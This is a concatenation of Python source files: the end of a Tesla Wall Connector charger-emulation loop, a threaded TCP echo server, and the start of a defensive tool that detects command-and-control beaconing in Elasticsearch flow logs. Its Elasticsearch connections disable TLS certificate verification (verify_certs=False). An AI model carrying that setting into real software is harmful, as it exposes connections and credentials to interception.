if(slaveTWC.protocolVersion == 1 and slaveTWC.minAmpsTWCSupports == 6):
if(len(msg) == 14):
slaveTWC.protocolVersion = 1
slaveTWC.minAmpsTWCSupports = 5
elif(len(msg) == 16):
slaveTWC.protocolVersion = 2
slaveTWC.minAmpsTWCSupports = 6
if(debugLevel >= 1):
print(time_now() + ": Set slave TWC %02X%02X protocolVersion to %d, minAmpsTWCSupports to %d." % \
(senderID[0], senderID[1], slaveTWC.protocolVersion, slaveTWC.minAmpsTWCSupports))
# We expect maxAmps to be 80 on U.S. chargers and 32 on EU
# chargers. Either way, don't allow
# slaveTWC.wiringMaxAmps to be greater than maxAmps.
if(slaveTWC.wiringMaxAmps > maxAmps):
print("\n\n!!! DANGER DANGER !!!\nYou have set wiringMaxAmpsPerTWC to "
+ str(wiringMaxAmpsPerTWC)
+ " which is greater than the max "
+ str(maxAmps) + " amps your charger says it can handle. " \
"Please review instructions in the source code and consult an " \
"electrician if you don't know what to do.")
slaveTWC.wiringMaxAmps = maxAmps / 4
# Make sure we print one SHB message after a slave
# linkready message is received by clearing
# lastHeartbeatDebugOutput. This helps with debugging
# cases where I can't tell if we responded with a
# heartbeat or not.
slaveTWC.lastHeartbeatDebugOutput = ''
slaveTWC.timeLastRx = time.time()
slaveTWC.send_master_heartbeat()
else:
msgMatch = re.search(b'\A\xfd\xe0(..)(..)(.......+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle heartbeat message from slave.
#
# These messages come in as a direct response to each
# heartbeat message from master. Slave does not send its
# heartbeat until it gets one from master first.
# A real master sends heartbeat to a slave around once per
# second, so we do the same near the top of this for()
# loop. Thus, we should receive a heartbeat reply from the
# slave around once per second as well.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
try:
slaveTWC = slaveTWCs[senderID]
except KeyError:
# Normally, a slave only sends us a heartbeat message if
# we send them ours first, so it's not expected we would
# hear heartbeat from a slave that's not in our list.
print(time_now() + ": ERROR: Received heartbeat message from " \
"slave %02X%02X that we've not met before." % \
(senderID[0], senderID[1]))
continue
if(fakeTWCID == receiverID):
slaveTWC.receive_slave_heartbeat(heartbeatData)
else:
# I've tried different fakeTWCID values to verify a
# slave will send our fakeTWCID back to us as
# receiverID. However, I once saw it send receiverID =
# 0000.
# I'm not sure why it sent 0000 and it only happened
# once so far, so it could have been corruption in the
# data or an unusual case.
if(debugLevel >= 1):
print(time_now() + ": WARNING: Slave TWC %02X%02X status data: " \
"%s sent to unknown TWC %02X%02X." % \
(senderID[0], senderID[1],
hex_str(heartbeatData), receiverID[0], receiverID[1]))
else:
msgMatch = re.search(b'\A\xfd\xeb(..)(..)(.+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle kWh total and voltage message from slave.
#
# This message can only be generated by TWCs running newer
# firmware. I believe it's only sent as a response to a
# message from Master in this format:
# FB EB <Master TWCID> <Slave TWCID> 00 00 00 00 00 00 00 00 00
# Since we never send such a message, I don't expect a slave
# to ever send this message to us, but we handle it just in
# case.
# According to FuzzyLogic, this message has the following
# format on an EU (3-phase) TWC:
# FD EB <Slave TWCID> 00000038 00E6 00F1 00E8 00
# 00000038 (56) is the total kWh delivered to cars
# by this TWC since its construction.
# 00E6 (230) is voltage on phase A
# 00F1 (241) is voltage on phase B
# 00E8 (232) is voltage on phase C
#
# I'm guessing in world regions with two-phase power that
# this message would be four bytes shorter, but the pattern
# above will match a message of any length that starts with
# FD EB.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
data = msgMatch.group(3)
if(debugLevel >= 1):
print(time_now() + ": Slave TWC %02X%02X unexpectedly reported kWh and voltage data: %s." % \
(senderID[0], senderID[1],
hex_str(data)))
else:
msgMatch = re.search(b'\A\xfc(\xe1|\xe2)(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00.+\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
foundMsgMatch = True
print(time_now() + " ERROR: TWC is set to Master mode so it can't be controlled by TWCManager. " \
"Search installation instruction PDF for 'rotary switch' and set " \
"switch so its arrow points to F on the dial.")
if(foundMsgMatch == False):
print(time_now() + ": *** UNKNOWN MESSAGE FROM SLAVE:" + hex_str(msg)
+ "\nPlease private message user CDragon at http://teslamotorsclub.com " \
"with a copy of this error.")
else:
###########################
# Pretend to be a slave TWC
foundMsgMatch = False
msgMatch = re.search(b'\A\xfc\xe1(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle linkready1 from master.
# See notes in send_master_linkready1() for details.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
masterTWCID = senderID
# This message seems to always contain seven 00 bytes in its
# data area. If we ever get this message with non-00 data
# we'll print it as an unexpected message.
if(debugLevel >= 1):
print(time_now() + ": Master TWC %02X%02X Linkready1. Sign: %s" % \
(senderID[0], senderID[1], hex_str(sign)))
if(senderID == fakeTWCID):
master_id_conflict()
# Other than picking a new fakeTWCID if ours conflicts with
# master, it doesn't seem that a real slave will make any
# sort of direct response when sent a master's linkready1 or
# linkready2.
else:
msgMatch = re.search(b'\A\xfb\xe2(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle linkready2 from master.
# See notes in send_master_linkready2() for details.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
masterTWCID = senderID
# This message seems to always contain seven 00 bytes in its
# data area. If we ever get this message with non-00 data
# we'll print it as an unexpected message.
if(debugLevel >= 1):
print(time_now() + ": Master TWC %02X%02X Linkready2. Sign: %s" % \
(senderID[0], senderID[1], hex_str(sign)))
if(senderID == fakeTWCID):
master_id_conflict()
else:
msgMatch = re.search(b'\A\xfb\xe0(..)(..)(.......+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle heartbeat message from Master.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
masterTWCID = senderID
try:
slaveTWC = slaveTWCs[receiverID]
except KeyError:
slaveTWC = new_slave(receiverID, 80)
slaveTWC.masterHeartbeatData = heartbeatData
if(receiverID != fakeTWCID):
# This message was intended for another slave.
# Ignore it.
if(debugLevel >= 11):
print(time_now() + ": Master %02X%02X sent " \
"heartbeat message %s to receiver %02X%02X " \
"that isn't our fake slave." % \
(senderID[0], senderID[1],
hex_str(heartbeatData),
receiverID[0], receiverID[1]))
continue
amps = (slaveHeartbeatData[1] << 8) + slaveHeartbeatData[2]
kWhDelivered += (((240 * (amps/100)) / 1000 / 60 / 60) * (now - timeLastkWhDelivered))
timeLastkWhDelivered = now
if(time.time() - timeLastkWhSaved >= 300.0):
timeLastkWhSaved = now
if(debugLevel >= 9):
print(time_now() + ": Fake slave has delivered %.3fkWh" % \
(kWhDelivered))
save_settings()
if(heartbeatData[0] == 0x07):
# Lower amps in use (not amps allowed) by 2 for 10
# seconds. Set state to 07.
slaveHeartbeatData[0] = heartbeatData[0]
timeToRaise2A = now + 10
amps -= 280
slaveHeartbeatData[3] = ((amps >> 8) & 0xFF)
slaveHeartbeatData[4] = (amps & 0xFF)
elif(heartbeatData[0] == 0x06):
# Raise amp setpoint by 2 permanently and reply with
# state 06. After 44 seconds, report state 0A.
timeTo0Aafter06 = now + 44
slaveHeartbeatData[0] = heartbeatData[0]
amps += 200
slaveHeartbeatData[1] = ((amps >> 8) & 0xFF)
slaveHeartbeatData[2] = (amps & 0xFF)
amps -= 80
slaveHeartbeatData[3] = ((amps >> 8) & 0xFF)
slaveHeartbeatData[4] = (amps & 0xFF)
elif(heartbeatData[0] == 0x05 or heartbeatData[0] == 0x08 or heartbeatData[0] == 0x09):
if(((heartbeatData[1] << 8) + heartbeatData[2]) > 0):
# A real slave mimics master's status bytes [1]-[2]
# representing max charger power even if the master
# sends it a crazy value.
slaveHeartbeatData[1] = heartbeatData[1]
slaveHeartbeatData[2] = heartbeatData[2]
ampsUsed = (heartbeatData[1] << 8) + heartbeatData[2]
ampsUsed -= 80
slaveHeartbeatData[3] = ((ampsUsed >> 8) & 0xFF)
slaveHeartbeatData[4] = (ampsUsed & 0xFF)
elif(heartbeatData[0] == 0):
if(timeTo0Aafter06 > 0 and timeTo0Aafter06 < now):
timeTo0Aafter06 = 0
slaveHeartbeatData[0] = 0x0A
elif(timeToRaise2A > 0 and timeToRaise2A < now):
# Real slave raises amps used by 2 exactly 10
# seconds after being sent into state 07. It raises
# a bit slowly and sets its state to 0A 13 seconds
# after state 07. We aren't exactly emulating that
# timing here but hopefully close enough.
timeToRaise2A = 0
amps -= 80
slaveHeartbeatData[3] = ((amps >> 8) & 0xFF)
slaveHeartbeatData[4] = (amps & 0xFF)
slaveHeartbeatData[0] = 0x0A
elif(heartbeatData[0] == 0x02):
print(time_now() + ": Master heartbeat contains error %ld: %s" % \
(heartbeatData[1], hex_str(heartbeatData)))
else:
print(time_now() + ": UNKNOWN MHB state %s" % \
(hex_str(heartbeatData)))
# Slaves always respond to master's heartbeat by sending
# theirs back.
slaveTWC.send_slave_heartbeat(senderID)
slaveTWC.print_status(slaveHeartbeatData)
else:
msgMatch = re.search(b'\A\xfc\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle 2-hour idle message
#
# This message is sent from a Master TWC three times in a
# row every 2 hours:
# c0 fc 1d 00 00 00 00 00 00 00 00 00 00 00 1d c0
#
# I'd say this is used to indicate the master is still
# alive, but it doesn't contain the Master's TWCID or any other
# data so I don't see what any receiving TWC can do with it.
#
# I suspect this message is only sent when the master
# doesn't see any other TWCs on the network, so I don't
# bother to have our fake master send these messages being
# as there's no point in playing a fake master with no
# slaves around.
foundMsgMatch = True
if(debugLevel >= 1):
print(time_now() + ": Received 2-hour idle message from Master.")
else:
msgMatch = re.search(b'\A\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle linkready message from slave on network that
# presumably isn't us.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100
if(debugLevel >= 1):
print(time_now() + ": %.2f amp slave TWC %02X%02X is ready to link. Sign: %s" % \
(maxAmps, senderID[0], senderID[1],
hex_str(sign)))
if(senderID == fakeTWCID):
print(time_now() + ": ERROR: Received slave heartbeat message from " \
"slave %02X%02X that has the same TWCID as our fake slave." % \
(senderID[0], senderID[1]))
continue
new_slave(senderID, maxAmps)
else:
msgMatch = re.search(b'\A\xfd\xe0(..)(..)(.......+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle heartbeat message from slave on network that
# presumably isn't us.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
if(senderID == fakeTWCID):
print(time_now() + ": ERROR: Received slave heartbeat message from " \
"slave %02X%02X that has the same TWCID as our fake slave." % \
(senderID[0], senderID[1]))
continue
try:
slaveTWC = slaveTWCs[senderID]
except KeyError:
# Slave is unlikely to send another linkready since it's
# already linked with a real Master TWC, so just assume
# it's 80A.
slaveTWC = new_slave(senderID, 80)
slaveTWC.print_status(heartbeatData)
else:
msgMatch = re.search(b'\A\xfb\xeb(..)(..)(\x00\x00\x00\x00\x00\x00\x00\x00\x00+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle voltage request message. This is only supported in
# Protocol 2 so we always reply with a 16-byte message.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
if(senderID == fakeTWCID):
print(time_now() + ": ERROR: Received voltage request message from " \
"TWC %02X%02X that has the same TWCID as our fake slave." % \
(senderID[0], senderID[1]))
continue
if(debugLevel >= 8):
print(time_now() + ": VRQ from %02X%02X to %02X%02X" % \
(senderID[0], senderID[1], receiverID[0], receiverID[1]))
if(receiverID == fakeTWCID):
kWhCounter = int(kWhDelivered)
kWhPacked = bytearray([((kWhCounter >> 24) & 0xFF),
((kWhCounter >> 16) & 0xFF),
((kWhCounter >> 8) & 0xFF),
(kWhCounter & 0xFF)])
print(time_now() + ": VRS %02X%02X: %dkWh (%s) %dV %dV %dV" % \
(fakeTWCID[0], fakeTWCID[1],
kWhCounter, hex_str(kWhPacked), 240, 0, 0))
send_msg(bytearray(b'\xFD\xEB') + fakeTWCID
+ kWhPacked
+ bytearray(b'\x00\xF0\x00\x00\x00\x00\x00'))
else:
msgMatch = re.search(b'\A\xfd\xeb(..)(.........+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle voltage response message.
# Example US value:
# FD EB 7777 00000014 00F6 0000 0000 00
# EU value (3 phase power):
# FD EB 7777 00000038 00E6 00F1 00E8 00
foundMsgMatch = True
senderID = msgMatch.group(1)
data = msgMatch.group(2)
kWhCounter = (data[0] << 24) + (data[1] << 16) + (data[2] << 8) + data[3]
voltsPhaseA = (data[4] << 8) + data[5]
voltsPhaseB = (data[6] << 8) + data[7]
voltsPhaseC = (data[8] << 8) + data[9]
if(senderID == fakeTWCID):
print(time_now() + ": ERROR: Received voltage response message from " \
"TWC %02X%02X that has the same TWCID as our fake slave." % \
(senderID[0], senderID[1]))
continue
if(debugLevel >= 1):
print(time_now() + ": VRS %02X%02X: %dkWh %dV %dV %dV" % \
(senderID[0], senderID[1],
kWhCounter, voltsPhaseA, voltsPhaseB, voltsPhaseC))
if(foundMsgMatch == False):
print(time_now() + ": ***UNKNOWN MESSAGE from master: " + hex_str(msg))
except KeyboardInterrupt:
print("Exiting after background tasks complete...")
break
except Exception as e:
# Print info about unhandled exceptions, then continue. Search for
# 'Traceback' to find these in the log.
traceback.print_exc()
# Sleep 5 seconds so the user might see the error.
time.sleep(5)
# Wait for background tasks thread to finish all tasks.
# Note that there is no such thing as backgroundTasksThread.stop(). Because we
# set the thread type to daemon, it will be automatically killed when we exit
# this program.
backgroundTasksQueue.join()
ser.close()
#
# End main program
#
##############################
|
server.py | import socket, sys, json
import threading
def threadWork(client, adr):
    """Serve a single client connection on its own thread.

    Echoes every message back to the client and, for JSON payloads on the
    known channels, logs the sender's name.

    :param client: connected socket to read from / echo to
    :param adr: client address tuple, used only in log messages
    """
    try:
        while True:
            msg = client.recv(1024).decode('utf-8')
            if not msg:
                # Empty read: the peer closed the connection cleanly.
                print("----------------------------------------------")
                print(f'client {adr} closed')
                print("----------------------------------------------")
                break
            print ("Client send: " + msg)
            client.sendall(("You say: " + msg).encode('utf-8'))
            try:
                data = json.loads(msg)
                # Both known channels just log the sender's name.
                if data['channel'] in ('00001', '00002'):
                    print('name: {}'.format(data['name']))
            except (ValueError, KeyError, TypeError) as e:
                # Non-JSON or malformed payloads are logged, not fatal.
                print(e)
    except Exception as e:
        # Unexpected socket/decoding failure: log and drop the client.
        print("----------------------------------------------")
        print(e)
        print('client {} closed'.format(adr))
        print("----------------------------------------------")
    finally:
        # Always release the socket. The original only closed it on the
        # exception path, leaking the descriptor on clean shutdown.
        client.close()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Allow quick restarts without "Address already in use" errors.
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', 9999))
sock.listen(5)
print('server start ...')
try:
    while True:
        # Hand each accepted connection to a daemon thread so a slow
        # client never blocks the accept loop.
        (csock, adr) = sock.accept()
        print ("Client Info: ", csock, adr)
        t = threading.Thread(target=threadWork, args=(csock, adr), daemon=True)
        t.start()
except KeyboardInterrupt:
    # Ctrl-C: fall through so the listening socket is closed below.
    # (The original unconditional loop made the trailing sock.close()
    # unreachable.)
    print('server shutting down ...')
sock.close() |
command_control.py | # coding: utf-8
import sys
from flare.tools.utils import bcolors
from flare.base.config import flareConfig
try:
import pandas as pd
except:
print("Please make sure you have pandas installed. pip -r requirements.txt or pip install pandas")
sys.exit(0)
try:
from elasticsearch import Elasticsearch, helpers, RequestsHttpConnection
except:
print("Please make sure you have elasticsearch module installed. pip -r requirements.txt or pip install elasticsearch")
sys.exit(0)
from multiprocessing import Process, JoinableQueue, Lock, Manager
from flare.tools.iputils import private_check, multicast_check, reserved_check
from flare.tools.whoisip import WhoisLookup
import time
import warnings
import os
import datetime
import json
warnings.filterwarnings('ignore')
config_default = os.path.join(os.path.dirname(__file__), '..', '..', 'configs/elasticsearch.ini')
class elasticBeacon(object):
    """
    Elastic Beacon is designed to identify periodic communication between
    network communicatiors. Future updates will allow for dynamic fields to be passed in.

    If you do not allow your elastic search server to communicate externally, you can setup an
    ssh tunnel by using ssh -NfL 9200:localhost:9200 username@yourserver

    Otherwise, you'll need to adjust es_host to the IP address that is exposed to elasticSearch.
    """

    def __init__(self,
                 config_in=None,
                 min_occur=10,
                 min_percent=5,
                 window=2,
                 threads=8,
                 period=24,
                 min_interval=2,
                 es_host='localhost',
                 es_port=9200,
                 es_timeout=480,
                 es_index='logstash-flow-*',
                 kibana_version='4',
                 verbose=True,
                 debug=True):
        """
        :param config_in: optional path to an .ini file; when given, its
            [beacon] section overrides every keyword argument below
        :param min_occur: Minimum number of triads to be considered beaconing
        :param min_percent: Minimum percentage of all connection attempts that
            must fall within the window to be considered beaconing
        :param window: Size of window in seconds in which we group connections to determine percentage, using a
            large window size can give inaccurate interval times, multiple windows contain all interesting packets,
            so the first window to match is the interval
        :param threads: Number of cores to use
        :param period: Number of hours to locate beacons for
        :param min_interval: Minimum interval betweeen events to consider for beaconing behavior
        :param es_host: IP Address of elasticsearch host (default is localhost)
        :param es_timeout: Sets timeout to 480 seconds
        :param kibana_version: 4 or 5 (query will depend on version)
        """
        #self.config_in = config_in
        # Two configuration paths populate the same attributes: a config file
        # (wins when provided) or the keyword arguments.
        if config_in is not None:
            try:
                self.config = flareConfig(config_in)
                self.es_host = self.config.get('beacon', 'es_host')
                self.es_port = int(self.config.get('beacon', 'es_port'))
                self.es_index = self.config.get('beacon', 'es_index')
                self.use_ssl = self.config.get('beacon', 'use_ssl')
                self.MIN_OCCURRENCES = int(self.config.get('beacon', 'min_occur'))
                self.MIN_PERCENT = int(self.config.get('beacon', 'min_percent'))
                self.WINDOW = int(self.config.get('beacon', 'window'))
                self.NUM_PROCESSES = int(self.config.get('beacon', 'threads'))
                self.period = int(self.config.get('beacon', 'period'))
                self.min_interval = int(self.config.get('beacon', 'min_interval'))
                self.es_timeout = int(self.config.get('beacon', 'es_timeout'))
                self.kibana_version = self.config.get('beacon', 'kibana_version')
                # Field-name mapping so different log schemas (e.g. Suricata)
                # can be queried with the same code.
                self.beacon_src_ip = self.config.get('beacon', 'field_source_ip')
                self.beacon_dest_ip = self.config.get('beacon', 'field_destination_ip')
                self.beacon_destination_port = self.config.get('beacon', 'field_destination_port')
                self.beacon_timestamp = self.config.get('beacon', 'field_timestamp')
                self.beacon_flow_bytes_toserver = self.config.get('beacon', 'field_flow_bytes_toserver')
                self.beacon_flow_id = self.config.get('beacon', 'field_flow_id')
                self.beacon_event_type = self.config.get('beacon', 'event_type')
                self.filter = self.config.get('beacon', 'filter')
                self.verbose = self.config.config.getboolean('beacon', 'verbose')
                self.auth_user = self.config.config.get('beacon', 'username')
                self.auth_password = self.config.config.get('beacon', 'password')
                self.suricata_defaults = self.config.config.getboolean('beacon', 'suricata_defaults')
                try:
                    # 'debug' is optional in the config file.
                    self.debug = self.config.config.getboolean('beacon', 'debug')
                except:
                    pass
            except Exception as e:
                print(('{red}[FAIL]{endc} Could not properly load your config!\nReason: {e}'.format(red=bcolors.FAIL, endc=bcolors.ENDC, e=e)))
                sys.exit(0)
        else:
            # No config file: take everything from the keyword arguments.
            self.es_host = es_host
            self.es_port = es_port
            self.es_index = es_index
            self.use_ssl = False
            self.MIN_OCCURRENCES = min_occur
            self.MIN_PERCENT = min_percent
            self.WINDOW = window
            self.NUM_PROCESSES = threads
            self.period = period
            self.min_interval = min_interval
            self.kibana_version = kibana_version
            self.es_timeout = es_timeout
            self.beacon_src_ip = 'src_ip'
            self.beacon_dest_ip = 'dest_ip'
            self.beacon_destination_port = 'dest_port'
            self.beacon_timestamp = '@timestamp'
            self.beacon_flow_bytes_toserver = 'bytes_toserver'
            self.beacon_flow_id = 'flow_id'
            self.beacon_event_type = 'flow'
            self.filter = ''
            self.verbose = verbose
            self.suricata_defaults = False
        # Kibana-version-dependent query wrapper: v4 uses filtered/query,
        # v5 uses bool/must.
        self.ver = {'4': {'filtered': 'query'}, '5': {'bool': 'must'}}
        self.filt = list(self.ver[self.kibana_version].keys())[0]
        self.query = list(self.ver[self.kibana_version].values())[0]
        # NOTE(review): this unconditionally overwrites any 'debug' value read
        # from the config file above -- confirm which one should win.
        self.debug = debug
        self.whois = WhoisLookup()
        self.info = '{info}[INFO]{endc}'.format(info=bcolors.OKBLUE, endc=bcolors.ENDC)
        self.success = '{green}[SUCCESS]{endc}'.format(green=bcolors.OKGREEN, endc=bcolors.ENDC)
        # Column order of the rows appended by find_beacon().
        self.fields = [self.beacon_src_ip, self.beacon_dest_ip, self.beacon_destination_port, self.beacon_flow_bytes_toserver, 'dest_degree', 'occurrences', 'percent', 'interval']
        # auth_user/auth_password only exist when loaded from a config file;
        # an AttributeError here means no authentication was configured.
        try:
            _ = (self.auth_user, self.auth_password)
            self.auth = "Enabled"
        except AttributeError as e:
            self.auth = "None"
        try:
            self.vprint('{info}[INFO]{endc} Attempting to connect to elasticsearch...'.format(info=bcolors.OKBLUE, endc=bcolors.ENDC))
            if self.auth == "None":
                self.es = Elasticsearch(self.es_host, port=self.es_port, timeout=self.es_timeout, verify_certs=False, use_ssl=self.use_ssl, connection_class=RequestsHttpConnection)
            else:
                self.es = Elasticsearch(self.es_host, port=self.es_port, timeout=self.es_timeout, http_auth=(self.auth_user, self.auth_password), verify_certs=False, use_ssl=self.use_ssl, connection_class=RequestsHttpConnection)
            self.vprint('{green}[SUCCESS]{endc} Connected to elasticsearch on {host}:{port}'.format(green=bcolors.OKGREEN, endc=bcolors.ENDC, host=self.es_host, port=str(self.es_port)))
        except Exception as e:
            self.vprint(e)
            raise Exception(
                "Could not connect to ElasticSearch -- Please verify your settings are correct and try again.")
        # Work queue plus locks shared by the find_beacon() worker processes.
        self.q_job = JoinableQueue()
        self.l_df = Lock()      # guards self.flow_data slicing
        self.l_list = Lock()    # guards the shared beacon_list
        self.high_freq = None
        # Pull the flow data up front; raises if the query returns nothing.
        self.flow_data = self.run_query()

    def vprint(self, msg):
        """Print *msg* only when verbose mode is on."""
        if self.verbose:
            print(msg)

    def dprint(self, msg):
        """Print *msg* with a [DEBUG] prefix only when debug mode is on."""
        if self.debug:
            print(("[DEBUG] " + str(msg)))

    def hour_query(self, h, *fields):
        """Build the Elasticsearch query dict covering the last *h* hours.

        :param h: Number of hours to look for beaconing (recommend 24 if computer can support it)
        :param fields: Retrieve only these fields -- example "src_ip", "dest_ip", "src_port", "dest_port"
        :return: query dict ready to pass to helpers.scan()
        """
        # Timestamp in ES is in milliseconds
        NOW = int(time.time() * 1000)
        SECONDS = 1000
        MINUTES = 60 * SECONDS
        HOURS = 60 * MINUTES
        lte = NOW
        gte = int(NOW - h * HOURS)
        if self.es_index:
            # Require the three key fields to exist; append the optional
            # user-supplied filter expression.
            if self.filter:
                self.query_string = "_exists_:" + self.beacon_src_ip + " AND _exists_:" + self.beacon_destination_port + " AND _exists_:" + self.beacon_dest_ip + " AND " + self.filter
            else:
                self.query_string = "_exists_:" + self.beacon_src_ip + " AND _exists_:" + self.beacon_destination_port + " AND _exists_:" + self.beacon_dest_ip
            query = {
                "query": {
                    self.filt: {
                        self.query: {
                            "query_string": {
                                "query": self.query_string,
                                "analyze_wildcard": 'true'
                            }
                        },
                        "filter": [{
                            "bool": {
                                "must": [
                                    {
                                        "range": {
                                            self.beacon_timestamp: {
                                                "gte": gte,
                                                "lte": lte,
                                                "format": "epoch_millis"
                                            }
                                        }
                                    }
                                ],
                                "must_not": []
                            }
                        },
                            {"term": {"event_type": self.beacon_event_type}}
                        ]
                    }
                }
            }
        else:
            # Fallback when no index is configured: hard-coded default field
            # names and a plain (non-list) filter clause.
            # NOTE(review): unlike the branch above, the optional filter is
            # appended without a leading " AND " -- confirm intended.
            if self.filter:
                self.query_string = "_exists_:src_ip AND _exists_:dest_ip AND _exists_:dest_port" + self.filter
            else:
                self.query_string = "_exists_:src_ip AND _exists_:dest_ip AND _exists_:dest_port"
            query = {
                "query": {
                    self.filt: {
                        self.query: {
                            "query_string": {
                                "query": self.query_string,
                                "analyze_wildcard": 'true'
                            }
                        },
                        "filter": {
                            "bool": {
                                "must": [
                                    {
                                        "range": {
                                            "timestamp": {
                                                "gte": gte,
                                                "lte": lte,
                                                "format": "epoch_millis"
                                            }
                                        }
                                    }
                                ],
                                "must_not": []
                            }
                        }
                    }
                }
            }
        if fields:
            # Restrict the returned _source to the requested fields only.
            query["_source"] = list(fields)
        self.dprint(query)
        return query

    def percent_grouping(self, d, total):
        """Slide a WINDOW over the interval histogram *d* and find the densest one.

        :param d: mapping of inter-event interval (seconds) -> occurrence count
        :param total: total number of events in *d*
        :return: (interval at the densest window's centre, its percentage of *total*)
        """
        mx = 0
        interval = 0
        # Finding the key with the largest value (interval with most events)
        mx_key = int(max(iter(list(d.keys())), key=(lambda key: d[key])))
        mx_percent = 0.0
        # Slide the window so that every position still covers mx_key.
        for i in range(mx_key - self.WINDOW, mx_key + 1):
            current = 0
            # Finding center of current window
            curr_interval = i + int(self.WINDOW / 2)
            for j in range(i, i + self.WINDOW):
                if j in d:
                    current += d[j]
            percent = float(current) / total * 100
            if percent > mx_percent:
                mx_percent = percent
                interval = curr_interval
        return interval, mx_percent

    def run_query(self):
        """Fetch the flow records from Elasticsearch into a DataFrame.

        Also tags each row with a hashed (src, dest, port) 'triad_id' and
        records the frequently-seen triads in self.high_freq.

        :raises Exception: when the query returns no documents
        """
        self.vprint("{info} Gathering flow data... this may take a while...".format(info=self.info))
        FLOW_BYTES = self.beacon_flow_bytes_toserver
        if self.suricata_defaults:
            # Suricata nests the byte counter under the 'flow' object.
            FLOW_BYTES = 'flow.' + FLOW_BYTES
        query = self.hour_query(self.period, self.beacon_src_ip, self.beacon_dest_ip, self.beacon_destination_port,
                                self.beacon_timestamp, FLOW_BYTES, self.beacon_flow_id)
        self.dprint(query)
        # helpers.scan streams every matching document via the scroll API.
        resp = helpers.scan(query=query, client=self.es, scroll="90m", index=self.es_index, timeout="10m")
        df = pd.DataFrame([rec['_source'] for rec in resp])
        if len(df) == 0:
            raise Exception("Elasticsearch did not retrieve any data. Please ensure your settings are correct inside the config file.")
        self.dprint(df)
        # NOTE(review): writes to the hard-coded 'dest_port' column even when
        # self.beacon_destination_port is configured differently -- confirm.
        df['dest_port'] = df[self.beacon_destination_port].fillna(0).astype(int)
        if 'flow' in df.columns:
            # Flatten the nested Suricata flow object into a plain column.
            df[self.beacon_flow_bytes_toserver] = df['flow'].apply(lambda x: x.get(self.beacon_flow_bytes_toserver))
        # One hashed id per (src, dest, port) triad; used as the work unit.
        df['triad_id'] = (df[self.beacon_src_ip] + df[self.beacon_dest_ip] + df[self.beacon_destination_port].astype(str)).apply(hash)
        df['triad_freq'] = df.groupby('triad_id')['triad_id'].transform('count').fillna(0).astype(int)
        # Only triads seen more than MIN_OCCURRENCES times are worth scoring.
        self.high_freq = list(df[df.triad_freq > self.MIN_OCCURRENCES].groupby('triad_id').groups.keys())
        return df

    def find_beacon(self, q_job, beacon_list):
        """Worker-process body: score queued triads and append beacon rows.

        :param q_job: JoinableQueue of triad_ids to analyse
        :param beacon_list: shared (Manager) list collecting result rows
        """
        while not q_job.empty():
            triad_id = q_job.get()
            self.l_df.acquire()
            work = self.flow_data[self.flow_data.triad_id == triad_id]
            self.l_df.release()
            # Convert timestamps to epoch seconds, sort, and compute the
            # inter-event deltas for this triad.
            work[self.beacon_timestamp] = pd.to_datetime(work[self.beacon_timestamp])
            work[self.beacon_timestamp] = (work[self.beacon_timestamp].astype(int) / 1000000000).astype(int)
            work = work.sort_values([self.beacon_timestamp])
            work['delta'] = (work[self.beacon_timestamp] - work[self.beacon_timestamp].shift()).fillna(0)
            # Drop the first row: its delta is a meaningless fill value.
            work = work[1:]
            d = dict(work.delta.value_counts())
            # Discard deltas shorter than the configured minimum interval.
            for key in list(d.keys()):
                if key < self.min_interval:
                    del d[key]
            # Finding the total number of events
            total = sum(d.values())
            if d and total > self.MIN_OCCURRENCES:
                window, percent = self.percent_grouping(d, total)
                if percent > self.MIN_PERCENT and total > self.MIN_OCCURRENCES:
                    PERCENT = str(int(percent))
                    WINDOW = str(window)
                    SRC_IP = work[self.beacon_src_ip].unique()[0]
                    DEST_IP = work[self.beacon_dest_ip].unique()[0]
                    DEST_PORT = str(int(work[self.beacon_destination_port].unique()[0]))
                    BYTES_TOSERVER = work[self.beacon_flow_bytes_toserver].sum()
                    SRC_DEGREE = len(work[self.beacon_dest_ip].unique())
                    OCCURRENCES = total
                    self.l_list.acquire()
                    beacon_list.append([SRC_IP, DEST_IP, DEST_PORT, BYTES_TOSERVER, SRC_DEGREE, OCCURRENCES, PERCENT, WINDOW])
                    self.l_list.release()
            q_job.task_done()

    def find_beacons(self, group=True, focus_outbound=False, whois=True, csv_out=None, html_out=None, json_out=None):
        """Fan the high-frequency triads out to worker processes and report.

        :param group: group the result rows by destination fields
        :param focus_outbound: drop private/multicast/reserved destinations
        :param whois: enrich source/destination IPs with whois names
        :param csv_out: optional path for CSV output
